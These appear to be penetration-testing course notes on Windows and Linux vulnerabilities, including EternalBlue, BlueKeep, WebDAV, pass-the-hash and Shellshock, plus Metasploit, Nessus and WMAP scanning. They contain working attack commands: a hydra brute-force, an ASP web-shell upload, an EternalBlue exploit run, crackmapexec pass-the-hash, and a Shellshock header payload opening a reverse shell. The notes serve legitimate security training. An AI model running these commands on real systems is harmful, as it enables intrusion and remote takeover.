# 1.4 Vulnerability Assessment

***

## Windows Vulnerabilities

* Has been the dominant OS worldwide for a while
* Vulnerabilities ranging from MS08-067 to MS17-010
* Has various OS versions and releases, makes the threat surface fragmented

They share a likeness given the development and philosophy:

* Developed in C++ making them vulnerable to buffer overflows, arbitrary code execution, etc.
* Not configured to run securely by default
* Newly discovered vulnerabilities are not immediately patched by Microsoft
* Vulnerable to cross platform vulnerabilities (like SQL injection attacks)
* Also vulnerable to physical attacks

As for the types of Windows vulnerabilities, some of the categories are:

<table><thead><tr><th width="131">Category</th><th>Description</th></tr></thead><tbody><tr><td>Information disclosure</td><td>Vulnerability that allows an attacker to access confidential data</td></tr><tr><td>Buffer overflows</td><td>Caused by a programming error which allows attackers to write to a buffer and overrun the buffer to write data to allocated memory addresses</td></tr><tr><td>Remote code execution</td><td>Vulnerability that allows an attacker to remotely execute code on a target</td></tr><tr><td>Privilege escalation</td><td>Vulnerability that allows an attacker to elevate their privileges after initial compromise</td></tr><tr><td>DOS attack</td><td>Vulnerability that allows an attacker to consume a system's resources consequently preventing the system from functioning normally</td></tr></tbody></table>

### Frequently Exploited Services

Windows has various native services and protocols. These services provide an attacker with an access vector that they can utilize to gain access to a target host.

<table><thead><tr><th width="103">Service</th><th width="84">Ports</th><th>Purpose</th></tr></thead><tbody><tr><td>IIS</td><td>80, 443</td><td>Proprietary web server software</td></tr><tr><td>WebDAV</td><td>80, 443</td><td>HTTP extension that allows clients to update, delete, move and copy files on a web server. It's used to enable a web server to act as a file server</td></tr><tr><td>SMB</td><td>445</td><td>Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a LAN</td></tr><tr><td>RDP</td><td>3389</td><td>Proprietary GUI remote access protocol to remotely authenticate and interact with a Windows system</td></tr><tr><td>WinRM</td><td>5986, 443</td><td>Remote management protocol that can be used to facilitate remote access with Windows systems</td></tr></tbody></table>

### Scanning With Metasploit

Vulnerability scanning it to scan a system for vulnerabilities and verifying whether they can be exploited. We will be mainly using auxiliary and exploit Metasploit modules to scan and identify inherent vulnerabilities in services, OS, and web applications.

You can search for exploits within Metasploit using:

```bash
search type:exploit  name:(your search)
```

To search for Metasploit framework exploit modules from within a Kali terminal:

```bash
searchsploit "your search" | grep -e "Metasploit"
```

One very useful tool is `metasploit-autopwn`. It's available on GitHub [here](https://github.com/hahwul/metasploit-autopwn).

```bash
# To download the tool:
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb

# To move it into the metasploit framework
cd metasploit-autopwn
mv db_autopwn.rb /usr/share/metasploit-framework/plugins

# To load it within metasploit:
load db_autopwn
db_autopwn -p -t -PI
```

We can also use the `analyze` command to analyse an IP within the Metasploit framework for vulnerabilities which it has detected for which exploits are available.

### WebDAV Vulnerabilities

Microsoft IIS (Internet Information Services) is a web server software developed by Windows. It can be used to host website or web apps and provides admins with a GUI to manage websites. It can be used to host both static and dynamic web pages developed in ASP.NET and PHP. Normally runs on port 80 and 443.

The supported executable file extensions for IIS are:

* `.asp`
* `.aspx`
* `.config`
* `.php`

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manages files on remote web servers. It runs on top of Microsoft IIS on ports 80 and 443.

In order to connect to a WebDAV server, you have to provide credentials because it implements authentication (username and password). To exploit:

1. Identify whether WebDAV is running on IIS or Apache
2. Perform a brute-force attack to identify legitimate credentials to use for authentication
3. Authenticate with WebDAV
4. Upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target

One of the tools we can use to exploit WebDAV is davtest. Davtest is a scanner that will upload a directory and then it sends files with all different types of extensions to the WebDAV server and tries to execute them. It will then list out the file extensions that work this helps us know which web shell executable file to use against the WebDAV server.

```bash
davtest -auth username:password -url http://targetip/webdav
```

Another tool is cadaver. It's used for uploading, editing and moving files on a WebDAV server. We will use it to upload a web shell to the target IP address.

```bash
cadaver http://targetip/webdav
put /usr/share/webshells/asp/webshell.asp

(In other cases, where php is accepted, we can use that webshell instead of asp)
```

To brute-force credentials using hydra:

```bash
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (target ip) http-get /webdav/
```

### CVE-2017-0144 EternalBlue

The Windows SMB vulnerability EternalBlue (MS17-010 / CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.

It was developed by the NSA and then leaked to the public by a hacker group called the Shadow Brokers in 2017. It takes advantage of a vulnerability in the SMBv1 protocol that allows attackers to send specially crafted packets that allow to get a meterpreter session or a reverse shell.

It was used in the WannaCry ransomware attack on June 27, 2017, to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.

It affects multiple versions of Windows:

* Windows Vista
* Windows 7
* Windows Server 2008
* Windows 8.1
* Windows Server 2012
* Windows 10 (only a certain build)
* Windows Server 2016

Microsoft released patch for vulnerability in 2017, but many systems and companies have not yet patched their systems. It has an MSF auxiliary module that can be used to check if a target system is vulnerable to the exploit. It also has an exploit module that can be used to exploit the vulnerability on unpatched systems.

The auxiliary module - `smb_ms17_010` \
The exploit module - `ms17_010_eternalblue`

You can also manually exploit the vulnerability by utilizing publicly available exploits. To exploit it manually, it's called AutoBlue-MS17-010 and can be found [here](https://github.com/3ndG4me/AutoBlue-MS17-010).

```bash
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py (target ip) shellcode/sc_x64.bin
```

You can check if a system is vulnerable to this attack via Nmap:

```bash
nmap -sV -p445 --script=smb-vuln-ms17-010 (target ip)
```

Tip to set up a netcat listener:

```bash
nc -nvlp (the port you are listening on)
```

### CVE-2019-0708 BlueKeep

The Windows RDP vulnerability BlueKeep (CVE-2019-0708) is the name given to a vulnerability that can potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system. It was made public by Microsoft in May 2019 alongside which they released a patch for companies to repair. When discovered, about 1 million systems were vulnerable.

This exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to the kernel memory and execute code remotely at the system level without needing authentication.

It affects multiple versions of Windows:

* XP
* Vista
* Windows 7
* Windows Server 2008 & R2

It has many various illegitimate proof of concepts and exploit code that could be malicious in nature and is therefore recommended to only use verified exploit code and modules for exploitation. It has an auxiliary and exploit module that can be used to exploit unpatched systems.

The auxiliary module - `cve_2019_0708_bluekeep` \
The exploit module - `cve_2019_0708_bluekeep_rce`

Note that targeting Kernel space memory and applications will and can cause crashes. To avoid this, you want to be very careful and reduce the space that you are exploiting.

### Pass-the-Hash Attacks

It is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately. This will allow us to gain access as opposed to obtaining access via service exploitation.

We can use the Metasploit PsExec module or the Crackmapexec tool to do this. You need the LM hash as well as the NTLM hash to do this.

```bash
The exploit module within Metasploit is:
exploit/windows/smb/psexec

set SMBUser (username)
set SMBPass (LM_hash:NTLM_hash)
```

You will have to set a target to get a meterpreter session.

```bash
crackmapexec smb (target ip) -u (username) -H "NTLM Hash" -X "any command you'd like to run"
```

***

## Linux Vulnerabilities

Linux is a free and open-source OS that is comprised of the Linux kernel, and the GNU toolkit. Linux has various use-cases but it's typically deployed as a server operating system.

For this reason, there are specific services and protocols that will typically be found running on a Linux server. These services provide an attacker with an access vector that they can utilize to gain access to a target host.

### Frequently Exploited Services

<table><thead><tr><th width="97">Service</th><th width="84">Ports</th><th>Purpose</th></tr></thead><tbody><tr><td>Apache</td><td>80, 443</td><td>Free, open-source cross-platform web server. Accounts for over 80% of web servers globally.</td></tr><tr><td>SSH</td><td>22</td><td>Secure way to remotely access and control system over an unsecured network. Successor to Telnet.</td></tr><tr><td>FTP</td><td>21</td><td>Used to facilitate file sharing</td></tr><tr><td>SAMBA</td><td>445</td><td>Linux implementation of SMB</td></tr></tbody></table>

### CVE-2014-6271 Shellshock

The Linux Bash vulnerability Shellshock (CVE-2014-6271) is the name given to a vulnerability that is found in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. It was discovered by Stephane Chazelas on 12/09/2014 and was made public on 24/09/2014.

Bash is a Nix shell that is part of the GNU project and is the default shell for most Linux distributions. This vulnerability is caused by Bash whereby Bash executes trailing commands after a series of characters: `(){:;};.` This only affects Linux as Windows is not based on Nix.

In the context of remote exploitation, Apache web servers configured to run CGI scripts or `.sh` scripts are also vulnerable to this attack. CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system after which the output is display to the client.

In order to exploit it, you will need to locate an input vector or script that allows you to communicate with Bash. In the context on an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server. Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

Whenever we make a new HTTP request with a CGI script, then the server will run it with Bash so we can essentially input those characters within the User-Agent HTTP header followed by any other commands. It can be exploited manually or automatically with an exploit module.

We can check if an Apache web server is vulnerable to this attack using Nmap. Replace the `/gettime.cgi` with the path of the CGI script on the web server you are performing this on.

```bash
nmap -sV (target ip) --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
```

To exploit this, we need to have FoxyProxy enabled on Firefox to send traffic to Burp Suite. Then go to the tab, Proxy, and ensure that the intercept is on. Now, reload the page with the CGI script and send the traffic to the Repeater. Then delete the User-Agent information and replace it with the following. You can replace the reverse shell information with any command.

```html
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/your_ip/listen_port 0>&1'
```

To exploit this with the Metasploit framework, it has an auxiliary and exploit module. To run this, set the `RHOSTS` value to the target IP address and the `TARGETURI` value to the URL where the CGI file is running (in this case, it's `/gettime.cgi`). Also set the `LHOST` option to your IP address. Once this is done, you will have a meterpreter session.

The auxiliary module - `apache_mod_cgi_bash_env` \
The exploit module - `apache_mod_cgi_bash_env_exec`

***

## Vulnerability Scanning

### Nessus

It's a proprietary vulnerability scanner developed by Tenable. We can perform a scan on a target system which we can then import into Metasploit for analysis and exploitation. It automates the process of identifying vulnerabilities and provides us with information pertinent to a vulnerability like the CVE code.

There is a paid and free version of Nessus. The free version allows us to scan up to 16 IP addresses. We can access the link [here](https://www.tenable.com/products/nessus/nessus-essentials) and you can register for free to get the activation code.

Once you've completed a scan with Nessus, you can export the results as a `.nessus` file. We can then import this into the Metasploit framework using `db_import`. We can then go through these results and look for CVE codes. Then we can search for exploit modules using those CVE codes:

```bash
search cve:(enter the year) name:(the_service)
```

Alternatively, within the Nessus framework on the web, we can use the filter to filter out the results where Metasploit exploit modules are available. We can click on it and find the specific module name to run and gain a meterpreter session on the target.

### WMAP

WMAP is a tool which we use to web application vulnerability scanning. It can be used to automate web server enumeration. It's available as an MSF plugin and can be loaded directly into MSF. It can be integrated within the Metasploit Framework Database.

To load WMAP within Metasploit:

```bash
worskspace -a Web_Scan
load wmap

#To add a site to scan:
wmap_sites -a (target ip)

#To set up our target:
wmap_targets -t http://(target_ip)/

#To search for useful auxiliary modules for our target:
wmap_run -t

#To then run those auxiliary modules:
wmap_run -e

#To list out the vulnerabilities that wmap has found:
wmap_vulns -l
```

We can use the module `http_put` to test whether or not we can upload a file to a directory. If we can, then it can be exploited by uploading a malicious file.